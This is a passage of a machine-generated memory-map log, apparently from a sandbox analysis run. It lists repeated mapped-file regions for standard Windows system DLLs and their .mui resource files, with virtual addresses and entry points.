id = 3821 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3822 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3823 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3824 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3825 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3826 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3827 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3828 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3829 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3830 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3831 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3832 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3833 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3834 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3835 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3836 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3837 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3838 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3840 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3841 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3842 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3843 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3844 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3845 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3846 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3847 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3848 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3849 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3850 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3851 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3852 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3853 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3854 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3855 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3856 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3857 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3859 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3860 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3861 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3862 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3863 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3864 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3865 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3866 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3867 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3868 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3869 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3870 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3871 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3872 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3873 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3874 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3875 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3876 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3877 start_va = 0xb90000 end_va = 0xbb7fff monitored = 0 entry_point = 0xb91860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3878 start_va = 0xbc0000 end_va = 0xbc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 3879 start_va = 0xb90000 end_va = 0xbb7fff monitored = 0 entry_point = 0xb91860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3880 start_va = 0xbc0000 end_va = 0xbc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 3881 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3883 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3884 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3885 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3886 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3887 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3888 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3889 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3890 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3891 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3892 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3893 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3894 start_va = 0xb90000 end_va = 0xb9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3895 start_va = 0xba0000 end_va = 0xbadfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3896 start_va = 0xb90000 end_va = 0xb9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3897 start_va = 0xba0000 end_va = 0xbadfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3898 start_va = 0xb90000 end_va = 0xb9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3899 start_va = 0xba0000 end_va = 0xbadfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3900 start_va = 0x1260000 end_va = 0x2054fff monitored = 0 entry_point = 0x1343268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3901 start_va = 0x1260000 end_va = 0x2054fff monitored = 0 entry_point = 0x1343268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3902 start_va = 0xde0000 end_va = 0xe89fff monitored = 0 entry_point = 0xdf4100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3903 start_va = 0xb90000 end_va = 0xb93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3904 start_va = 0xde0000 end_va = 0xe89fff monitored = 0 entry_point = 0xdf4100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3906 start_va = 0xb90000 end_va = 0xb93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3907 start_va = 0xb90000 end_va = 0xbd7fff monitored = 0 entry_point = 0xbcfd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3908 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3909 start_va = 0xb90000 end_va = 0xbd7fff monitored = 0 entry_point = 0xbcfd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3910 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3911 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3912 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3913 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3914 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3915 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3916 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3917 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3918 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3919 start_va = 0x1260000 end_va = 0x13acfff monitored = 0 entry_point = 0x1362a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3920 start_va = 0xb90000 end_va = 0xb95fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3921 start_va = 0x1260000 end_va = 0x13acfff monitored = 0 entry_point = 0x1362a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3922 start_va = 0xb90000 end_va = 0xb95fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3923 start_va = 0xb90000 end_va = 0xb9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3924 start_va = 0xde0000 end_va = 0xe39fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3925 start_va = 0xb90000 end_va = 0xb9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3926 start_va = 0xde0000 end_va = 0xe39fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3928 start_va = 0xb90000 end_va = 0xb9ffff monitored = 0 entry_point = 0xb9a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 3929 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3930 start_va = 0xb90000 end_va = 0xb9ffff monitored = 0 entry_point = 0xb9a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 3931 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = 